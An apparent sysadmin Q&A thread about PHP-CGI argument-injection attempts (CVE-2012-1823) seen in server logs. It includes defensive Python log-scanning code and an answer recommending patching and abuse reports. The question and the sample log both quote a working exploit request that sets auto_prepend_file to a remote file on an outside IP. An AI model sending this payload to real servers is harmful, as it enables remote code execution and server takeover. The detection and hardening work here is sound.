
I'm getting a number of exploit attempts from different IPs today.

GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

The content of info3.txt is:

Google is showing a bunch of people talking about this for the past couple of days but no real solutions or explanations of what this is. There is a write up at: http://huguesjohnson.com/programming/hacking-attempt/

"I think this is where I'll leave things for now. I don't know if this site is part of a crime ring but since it has access to a botnet I'm going to assume it is. The 81.17.24.82 IP isn't showing up anywhere as a distributor of malware which is odd. Maybe this is a web server that was recently compromised or an IP address recently acquired by whoever is organizing this attack."

My question is: What is the next step in situations like this? Is there a best practice that administrators should follow to notify security folks? Which sites do you follow to keep on top of things like this and apply the proper safeguards (like mod_security)?
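Detection logic for the request quoted above, as an added example that is not part of the original post. It parses Apache combined-format access log lines, applies the CGI rule that a query string containing no literal `=` is handed to the CGI binary as command-line arguments, and pulls out the injected `-d` directives and the URL named in `auto_prepend_file` so they can be blocked and reported. The log regex, the sample lines and the function names are assumptions made for this example; the sample log is constructed, with its first line reproducing the request from the question.

```python
"""Flag PHP-CGI argument-injection attempts (CVE-2012-1823) in Apache access logs.

Constructed example: the regex, sample log lines and helper names are
assumptions for illustration, not code from the original post.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic). The first line reproduces the
# request quoted in the question; the other two are benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [08/May/2012:10:01:12 +0000] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [08/May/2012:10:02:30 +0000] "GET /index.php?page=about HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.7 - - [08/May/2012:10:03:44 +0000] "GET /index.php?about HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
"""


def php_cgi_argv(raw_query):
    """Return the argv list php-cgi would see, or None if the query is harmless.

    Per RFC 3875 a query string with no unencoded '=' is passed to the CGI
    program as command-line arguments, split on '+' and URL-decoded. Encoding
    the '=' as %3d keeps Apache on the argv path, and an unpatched php-cgi
    (before 5.3.12) then honours the leading '-d' options.
    """
    if not raw_query or "=" in raw_query:
        return None
    argv = [unquote(tok) for tok in raw_query.split("+")]
    return argv if argv[0].startswith("-") else None


def analyze_line(line):
    """Return a finding dict for an injection attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    argv = php_cgi_argv(urlsplit(m.group("target")).query)
    if argv is None:
        return None
    directives = {}
    for arg in argv:
        if arg.startswith("-d") and "=" in arg:
            key, value = arg[2:].split("=", 1)
            directives[key] = value
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "argv": argv,
        "directives": directives,
        # The URL pulled in via auto_prepend_file is what to hand to the
        # hosting provider's abuse contact and to block at the egress firewall.
        "remote_include": directives.get("auto_prepend_file"),
    }


def scan_log(text):
    """Run analyze_line over every line of an access log and keep the hits."""
    return [f for f in (analyze_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["timestamp"], "remote include:", f["remote_include"])
        for k, v in f["directives"].items():
            print("   -d", k, "=", v)
```

Pipe a real access log through `scan_log` (or run it on the constructed sample) to get one finding per attempt with the source IP, the full argv php-cgi would have received and the remote include URL; a benign query such as `page=about` or `about` produces nothing because it either contains a literal `=` or does not start with `-`.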

1 Answer


It's obvious that they are trying to exploit the recent bug found in PHP when configured as CGI (CVE-2012-1823).
What they are trying to achieve in the end, we can only guess until we hear from people who actually got compromised and analyzed the server afterwards.
From what it looks like at the moment, the attempt is to run the C99 shell on those servers. We can't link that to botnet recruiting or any other purpose yet.

As an administrator you should certainly check that you are not vulnerable to that attack, which in this case means verifying that you have PHP >= 5.3.12 deployed.

You could try to contact the abuse team of the owner of the IP from which the attack is originating and of the IP on which the info3.txt is being hosted. But that provider will probably not be very impressed by your claim.

Notify security folks?
No, I wouldn't; it's trying to exploit a known bug.

I found it useful to subscribe to the security and/or announce mailing lists of the software I'm exposing to the Internet and of our base operating system.
This way I get notified quickly about security problems and new releases which really concern me.

faker